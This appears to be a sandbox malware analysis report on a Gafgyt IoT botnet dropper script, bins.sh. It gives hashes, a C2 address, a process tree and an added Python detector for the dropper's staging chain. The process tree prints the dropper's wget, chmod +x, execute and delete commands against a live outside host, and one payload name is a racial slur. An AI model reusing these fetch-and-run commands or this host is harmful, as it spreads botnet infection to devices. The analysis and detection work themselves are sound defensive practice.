Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags
    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    03/08/2024, 04:52

General

  • Target

    bins.sh

  • Size

    1KB

  • MD5

    0019152fa30c6a1f5babd6dc28ff797f

  • SHA1

    06fbe116674f61cccd777f807c072569373c93ef

  • SHA256

    de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3

  • SHA512

    14fda525ebe67725117dd3187168e9b0aba4c79d1d10133c204406ab217a7a88cab2a982761ba2f5bbd71afbed4af6b70327acf071ec4c50433de529287af1db

Score
10/10

Malware Config

Extracted

Family

gafgyt

C2

93.123.85.216:39

Signatures

  • Detected Gafgyt variant (9 IoCs)
  • Gafgyt/Bashlite
    IoT botnet with numerous variants, first seen in 2014.
  • Executes dropped EXE (9 IoCs)
  • Reads system routing table (1 TTP, 4 IoCs)
    Gets active network interfaces from the /proc virtual filesystem.
  • Reads system network configuration (1 TTP, 4 IoCs)
    Uses the contents of the /proc filesystem to enumerate network settings.
  • Writes file to tmp directory (9 IoCs)
    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:657
    • /usr/bin/wget
      wget http://93.123.85.216/boobs
      2⤵
      • Writes file to tmp directory
      PID:665
    • /bin/chmod
      chmod +x boobs
      2⤵
      PID:673
    • /tmp/boobs
      ./boobs
      2⤵
      • Executes dropped EXE
      PID:675
    • /bin/rm
      rm -rf boobs
      2⤵
      PID:678
    • /usr/bin/wget
      wget http://93.123.85.216/boobs2
      2⤵
      • Writes file to tmp directory
      PID:680
    • /bin/chmod
      chmod +x boobs2
      2⤵
      PID:686
    • /tmp/boobs2
      ./boobs2
      2⤵
      • Executes dropped EXE
      PID:688
    • /bin/rm
      rm -rf boobs2
      2⤵
      PID:691
    • /usr/bin/wget
      wget http://93.123.85.216/roof
      2⤵
      • Writes file to tmp directory
      PID:692
    • /bin/chmod
      chmod +x roof
      2⤵
      PID:696
    • /tmp/roof
      ./roof
      2⤵
      • Executes dropped EXE
      PID:697
    • /bin/rm
      rm -rf roof
      2⤵
      PID:699
    • /usr/bin/wget
      wget http://93.123.85.216/ppc
      2⤵
      • Writes file to tmp directory
      PID:701
    • /bin/chmod
      chmod +x ppc
      2⤵
      PID:703
    • /tmp/ppc
      ./ppc
      2⤵
      • Executes dropped EXE
      PID:704
    • /bin/rm
      rm -rf ppc
      2⤵
      PID:706
    • /usr/bin/wget
      wget http://93.123.85.216/sparc
      2⤵
      • Writes file to tmp directory
      PID:707
    • /bin/chmod
      chmod +x sparc
      2⤵
      PID:708
    • /tmp/sparc
      ./sparc
      2⤵
      • Executes dropped EXE
      PID:709
    • /bin/rm
      rm -rf sparc
      2⤵
      PID:711
    • /usr/bin/wget
      wget http://93.123.85.216/darkness
      2⤵
      • Writes file to tmp directory
      PID:712
    • /bin/chmod
      chmod +x darkness
      2⤵
      PID:713
    • /tmp/darkness
      ./darkness
      2⤵
      • Executes dropped EXE
      • Reads system routing table
      • Reads system network configuration
      PID:714
    • /bin/rm
      rm -rf darkness
      2⤵
      PID:717
    • /usr/bin/wget
      wget http://93.123.85.216/arm5
      2⤵
      • Writes file to tmp directory
      PID:718
    • /bin/chmod
      chmod +x arm5
      2⤵
      PID:719
    • /tmp/arm5
      ./arm5
      2⤵
      • Executes dropped EXE
      • Reads system routing table
      • Reads system network configuration
      PID:720
    • /bin/rm
      rm -rf arm5
      2⤵
      PID:723
    • /usr/bin/wget
      wget http://93.123.85.216/arm6
      2⤵
      • Writes file to tmp directory
      PID:724
    • /bin/chmod
      chmod +x arm6
      2⤵
      PID:727
    • /tmp/arm6
      ./arm6
      2⤵
      • Executes dropped EXE
      • Reads system routing table
      • Reads system network configuration
      PID:728
    • /bin/rm
      rm -rf arm6
      2⤵
      PID:732
    • /usr/bin/wget
      wget http://93.123.85.216/NIGGA7
      2⤵
      • Writes file to tmp directory
      PID:733
    • /bin/chmod
      chmod +x NIGGA7
      2⤵
      PID:737
    • /tmp/NIGGA7
      ./NIGGA7
      2⤵
      • Executes dropped EXE
      • Reads system routing table
      • Reads system network configuration
      PID:738
    • /bin/rm
      rm -rf NIGGA7
      2⤵
      PID:741
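The process tree above is the whole dropper loop: for each architecture the script fetches a payload from 93.123.85.216 into /tmp, marks it executable, runs it and deletes it. As an added example that is not part of the sandbox report, the Python below flags that download -> chmod +x -> execute -> delete sequence when it happens in a staging directory under one parent process, and pulls the download host out as an IoC. The (pid, ppid, cwd, argv) record format is an assumption; the event list is constructed to mirror the report's PIDs and commands, and the final benign wget is a constructed control that must not be flagged.

```python
"""Detect the wget -> chmod +x -> execute -> rm staging loop of an IoT
dropper from process-execution records and report the download hosts.

Added example, not part of the sandbox report. SAMPLE_EVENTS is constructed
to mirror the report's process tree; the record layout (pid, ppid, cwd, argv)
is an assumption about how your EDR/auditd pipeline hands over exec events.
"""
import posixpath
from collections import Counter, defaultdict
from urllib.parse import urlparse

# World-writable directories where droppers stage payloads ("Writes file to tmp directory").
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample: (pid, ppid, cwd, argv). PIDs and commands follow the report.
SAMPLE_EVENTS = [
    (657, 1,   "/tmp", ["/tmp/bins.sh"]),
    (665, 657, "/tmp", ["wget", "http://93.123.85.216/boobs"]),
    (673, 657, "/tmp", ["chmod", "+x", "boobs"]),
    (675, 657, "/tmp", ["./boobs"]),
    (678, 657, "/tmp", ["rm", "-rf", "boobs"]),
    (718, 657, "/tmp", ["wget", "http://93.123.85.216/arm5"]),
    (719, 657, "/tmp", ["chmod", "+x", "arm5"]),
    (720, 657, "/tmp", ["./arm5"]),
    (723, 657, "/tmp", ["rm", "-rf", "arm5"]),
    # Constructed control: a download outside a staging dir, never made executable.
    (900, 1,   "/home/user", ["wget", "https://example.org/notes.txt"]),
]


def resolve(path, cwd):
    """Turn argv paths such as 'boobs' or './boobs' into an absolute path under cwd."""
    return posixpath.normpath(posixpath.join(cwd, path))


def wget_target(argv, cwd):
    """Return (url, output_path) for a wget invocation, or None if no URL is present.
    Honours '-O <file>'; otherwise wget names the file after the last URL path segment."""
    url = next((a for a in argv[1:] if a.startswith(("http://", "https://", "ftp://"))), None)
    if url is None:
        return None
    if "-O" in argv:
        out = argv[argv.index("-O") + 1]
    else:
        out = posixpath.basename(urlparse(url).path) or "index.html"
    return url, resolve(out, cwd)


def detect_dropper_chains(events):
    """Key every event by (parent pid, absolute file path) and flag files that one
    parent downloaded, made executable and executed from a staging directory."""
    stages = defaultdict(dict)  # (ppid, path) -> {"download": url, "chmod": True, "exec": pid, "rm": True}
    for pid, ppid, cwd, argv in events:
        prog = posixpath.basename(argv[0])
        if prog == "wget":
            hit = wget_target(argv, cwd)
            if hit:
                url, out = hit
                stages[(ppid, out)]["download"] = url
        elif prog == "chmod" and len(argv) >= 3:
            mode, *files = argv[1:]
            # Symbolic (+x, u+x, a+rx) or octal modes that set any execute bit.
            if "x" in mode or (mode.isdigit() and int(mode, 8) & 0o111):
                for f in files:
                    stages[(ppid, resolve(f, cwd))]["chmod"] = True
        elif prog == "rm":
            for f in argv[1:]:
                if not f.startswith("-"):
                    stages[(ppid, resolve(f, cwd))]["rm"] = True
        else:
            # Any other exec: record the binary that ran, keyed by its parent.
            stages[(ppid, resolve(argv[0], cwd))]["exec"] = pid

    findings = []
    for (ppid, path), s in stages.items():
        in_staging = posixpath.dirname(path) in STAGING_DIRS
        if in_staging and {"download", "chmod", "exec"}.issubset(s):
            findings.append({
                "parent_pid": ppid,
                "path": path,
                "url": s["download"],
                "host": urlparse(s["download"]).hostname,
                "exec_pid": s["exec"],
                "deleted_after_run": s.get("rm", False),
            })
    return sorted(findings, key=lambda f: f["exec_pid"])


def download_hosts(findings):
    """Count the hosts payloads were fetched from: the IoC list to block or hunt on."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    found = detect_dropper_chains(SAMPLE_EVENTS)
    for f in found:
        print(f"[dropper] ppid={f['parent_pid']} {f['path']} <- {f['url']} "
              f"(exec pid {f['exec_pid']}, deleted={f['deleted_after_run']})")
    print("download hosts:", dict(download_hosts(found)))
```

Grouping by parent PID matters: in the report every wget, chmod, payload and rm is a direct child of bins.sh (PID 657), so the chain is only visible when the four events are correlated through their common parent, not through a parent-child relation between them. The rm stage is recorded but not required, because a dropper that fails to clean up is still a dropper.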

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/NIGGA7
    Filesize
    275KB
    MD5
    658e8ab8f1bf7db543aa9b2b2fd595ce
    SHA1
    ce122d9bc9920bbd77826fcd7676f3081ec19752
    SHA256
    29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
    SHA512
    eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

  • /tmp/arm5
    Filesize
    216KB
    MD5
    e57c0097d80d17a52aad01a8c2e4f9fc
    SHA1
    fffadcdb51b879236df4d4cdf373216dd926e90e
    SHA256
    68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
    SHA512
    02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

  • /tmp/arm6
    Filesize
    238KB
    MD5
    1e78f279e22858585947a52ad8b127d7
    SHA1
    62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
    SHA256
    616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
    SHA512
    2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

  • /tmp/boobs
    Filesize
    246KB
    MD5
    1f918589efbef4b04e806b7a38fc63f8
    SHA1
    758f7a47b66a52ce59462ffd1c0f223af618077c
    SHA256
    267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
    SHA512
    d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

  • /tmp/boobs2
    Filesize
    246KB
    MD5
    348a8f1c5535fe6a0a698f457c329485
    SHA1
    a3415c48c1d18776ab9a02ef23fe65cef88af354
    SHA256
    c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
    SHA512
    e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

  • /tmp/darkness
    Filesize
    224KB
    MD5
    24393febb5e8a233a8df7f00b8c3b147
    SHA1
    f8240c5256c8a193ee8f2f93880203eca2f827d5
    SHA256
    49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
    SHA512
    be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

  • /tmp/ppc
    Filesize
    209KB
    MD5
    5cf85a36699cca11be8c96c3232654e0
    SHA1
    897379599414d22c9adf9b542266eb6b888b6542
    SHA256
    d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
    SHA512
    de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

  • /tmp/roof
    Filesize
    211KB
    MD5
    ca477454b7145f6d2180e32c6f0135f6
    SHA1
    da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
    SHA256
    6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
    SHA512
    561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

  • /tmp/sparc
    Filesize
    226KB
    MD5
    0e2c431d0b76d5d91af24cd90532cd93
    SHA1
    402554d878c7e73cdf145bb249c604a21e465e1f
    SHA256
    16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
    SHA512
    8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc